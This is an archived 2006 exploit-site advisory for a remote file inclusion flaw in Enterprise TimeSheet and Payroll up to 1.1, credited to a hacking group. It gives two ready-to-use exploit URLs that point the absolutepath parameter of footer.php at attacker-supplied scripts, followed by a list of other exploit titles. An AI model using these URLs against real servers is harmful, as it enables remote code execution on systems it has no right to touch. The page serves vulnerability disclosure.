exploits , vulnerabilities , articles , Enterprise Payroll Systems <= 1.1 (footer) Remote Include Vulnerability

2006-06-08

Enterprise Payroll Systems <= 1.1 (footer) Remote Include Vulnerability

Rated as : Moderate Risk

$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$  Enterprise TimeSheet and Payroll (EPS) <= v.1.1 Remote File Include
Vulnerability
$$  Script site: http://epayroll.sourceforge.net/
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$              Find by: Kacper (a.k.a Rahim)
$$
$$ Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$  Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
$$           Adam, DeathSpeed, Drzewko, pepi
$$
$$  Specjal greetz: DragonHeart ;-)
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Expl:


http://www.site.com/[EPS_path]/footer.php?absolutepath=[evil_scripts]

http://www.site.com/[EPS_path]/admin/footer.php?absolutepath=[evil_scripts]


#Pozdro dla wszystkich ;-)
securitydot.net - 2006-06-08

Exploits - newest 10 RSS | More

2007-06-15 56961 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34011 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42153 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29195 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19621 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16596 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19272 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16454 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33439 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17119 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit